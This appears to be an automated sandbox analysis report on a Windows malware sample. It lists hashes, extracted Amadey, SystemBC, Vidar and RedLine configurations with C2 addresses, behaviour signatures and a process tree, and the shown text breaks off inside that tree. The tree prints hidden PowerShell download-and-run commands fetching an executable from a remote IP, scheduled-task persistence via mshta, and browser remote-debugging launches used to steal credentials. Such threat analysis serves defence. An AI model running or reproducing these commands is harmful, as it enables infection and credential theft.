Overview

overview

10

Static

static

3

56e840cfaa...f8.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    116s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 01:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe

  • Size

    2.0MB

  • MD5

    036f6ba87f3956ce3a7caefcc5e62902

  • SHA1

    fa1c45c6fd4b205449a2f7b056a35ab791412034

  • SHA256

    56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8

  • SHA512

    e0ed80b04e38dcb2e10755a1b3ceb27b64a6a544e54f258ff835a4417bf1b05992298a824203e21d936435eb64f52791f7a109e5ecd7d404ed2aaeb94c6cb42f

  • SSDEEP

    49152:Vr2xO4OpVgqO6lddT9tcT2zvyQu1DEa9yG6hqwM:p2GgqO6lTx+4E17yG6hTM

Score
10/10
amadeyredlinesvcstealersystembcvidar092155ir7amtestprolivcredential_accessdefense_evasiondiscoverydownloaderexecutioninfostealerpersistencepyinstallerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86
Attributes
  • dns

    5.132.191.104

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

testproliv

C2

45.155.103.183:1488

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 12 IoCs
    stealer
  • Detects SvcStealer Payload 9 IoCs

    SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • Redline family
    redline
  • SvcStealer, Diamotrix

    SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.

    stealerdownloadersvcstealer
  • Svcstealer family
    svcstealer
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Systembc family
    systembc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 21 IoCs
  • Uses browser remote debugging 2 TTPs 19 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 38 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 29 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Adds Run key to start application
    • Suspicious use of AdjustPrivilegeToken
    PID:3388
    • C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe
      "C:\Users\Admin\AppData\Local\Temp\56e840cfaa39fa8934874c132402f3da87a9a29560e7fcedc92143782bd34df8.exe"
      2⤵
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5020
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          4⤵
          • Downloads MZ/PE file
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4492
          • C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe
            "C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:1812
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn vaukImabUuH /tr "mshta C:\Users\Admin\AppData\Local\Temp\YpdF1TCRw.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5056
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn vaukImabUuH /tr "mshta C:\Users\Admin\AppData\Local\Temp\YpdF1TCRw.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:4984
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\YpdF1TCRw.hta
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2308
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1796
                • C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE
                  "C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3968
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10096490121\am_no.cmd" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4372
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              6⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:4240
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2636
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4536
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2864
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1052
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:440
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4224
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "Bly4pmawnNh" /tr "mshta \"C:\Temp\iKyDhmRkP.hta\"" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2304
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\iKyDhmRkP.hta"
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:760
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4532
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1112
          • C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe
            "C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2312
          • C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe
            "C:\Users\Admin\AppData\Local\Temp\10097220101\Ps7WqSx.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1232
          • C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe
            "C:\Users\Admin\AppData\Local\Temp\10097230101\FvbuInU.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3904
          • C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe
            "C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:4424
            • C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe
              "C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe"
              6⤵
              • Executes dropped EXE
              PID:3660
            • C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe
              "C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe"
              6⤵
              • Executes dropped EXE
              PID:2840
            • C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe
              "C:\Users\Admin\AppData\Local\Temp\10097240101\MCxU5Fj.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2636
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 984
              6⤵
              • Program crash
              PID:2952
          • C:\Users\Admin\AppData\Local\Temp\10097250101\OEHBOHk.exe
            "C:\Users\Admin\AppData\Local\Temp\10097250101\OEHBOHk.exe"
            5⤵
            • Executes dropped EXE
            PID:2176
          • C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe
            "C:\Users\Admin\AppData\Local\Temp\10097260101\v6Oqdnc.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1852
          • C:\Users\Admin\AppData\Local\Temp\10097270101\W6ySCZP.exe
            "C:\Users\Admin\AppData\Local\Temp\10097270101\W6ySCZP.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:1156
            • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
              "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
              6⤵
              • Downloads MZ/PE file
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4436
              • C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe
                "C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1212
          • C:\Users\Admin\AppData\Local\Temp\10097280101\4klgwMz.exe
            "C:\Users\Admin\AppData\Local\Temp\10097280101\4klgwMz.exe"
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            PID:1616
          • C:\Users\Admin\AppData\Local\Temp\10097290101\JCFx2xj.exe
            "C:\Users\Admin\AppData\Local\Temp\10097290101\JCFx2xj.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:3948
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1936
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                7⤵
                • Uses browser remote debugging
                PID:5576
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd95aecc40,0x7ffd95aecc4c,0x7ffd95aecc58
                  8⤵
                    PID:5836
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1984,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1980 /prefetch:2
                    8⤵
                      PID:1592
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1844,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2108 /prefetch:3
                      8⤵
                        PID:5432
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2512 /prefetch:8
                        8⤵
                          PID:6016
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:2352
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3404 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:452
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3676,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:5644
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:8
                          8⤵
                            PID:180
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4672,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3660 /prefetch:8
                            8⤵
                              PID:5344
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4436,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8
                              8⤵
                                PID:6112
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4856,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5016 /prefetch:8
                                8⤵
                                  PID:6108
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5164,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5144 /prefetch:8
                                  8⤵
                                    PID:4748
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5232 /prefetch:8
                                    8⤵
                                      PID:1056
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5220,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5216 /prefetch:8
                                      8⤵
                                        PID:6044
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5364,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5372 /prefetch:8
                                        8⤵
                                          PID:5716
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5240,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:2
                                          8⤵
                                          • Uses browser remote debugging
                                          PID:5252
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        7⤵
                                        • Uses browser remote debugging
                                        PID:180
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd9e4746f8,0x7ffd9e474708,0x7ffd9e474718
                                          8⤵
                                            PID:1064
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
                                            8⤵
                                              PID:5364
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 /prefetch:3
                                              8⤵
                                                PID:912
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
                                                8⤵
                                                  PID:5976
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2596 /prefetch:2
                                                  8⤵
                                                    PID:5692
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
